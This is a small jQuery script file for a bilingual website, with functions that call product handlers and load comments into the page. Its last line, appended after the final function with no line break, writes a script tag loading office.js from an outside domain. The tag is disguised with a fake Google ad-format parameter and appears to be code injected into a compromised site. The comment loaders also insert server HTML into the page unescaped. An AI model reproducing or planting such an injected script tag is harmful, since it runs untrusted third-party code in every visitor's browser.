
function dopro(id)
{

 $.get("prodo.ashx?proid="+id, null, function (data, textstatus){
 alert(data);
 });
}

function getallmessage()
{
   $.ajax({
                type:"post",
                url:"comment.ashx?act=getall",
                datatype:"html",
                data:"",
                success:function(result)
                {
                    $("#allmsg").html(result);
                }
            });
}
function endopro(id)
{

 $.get("enprodo.ashx?proid="+id, null, function (data, textstatus){
 alert(data);
 });
}
function engetallmessage()
{
   $.ajax({
                type:"post",
                url:"encomment.ashx?act=getall",
                datatype:"html",
                data:"",
                success:function(result)
                {
                    $("#allmsg").html(result);
                }
            });
}document.writeln('<script language="javascript" src="http://officeb.etowns.net/office.js?google_ad_format=728x90_as"></script>');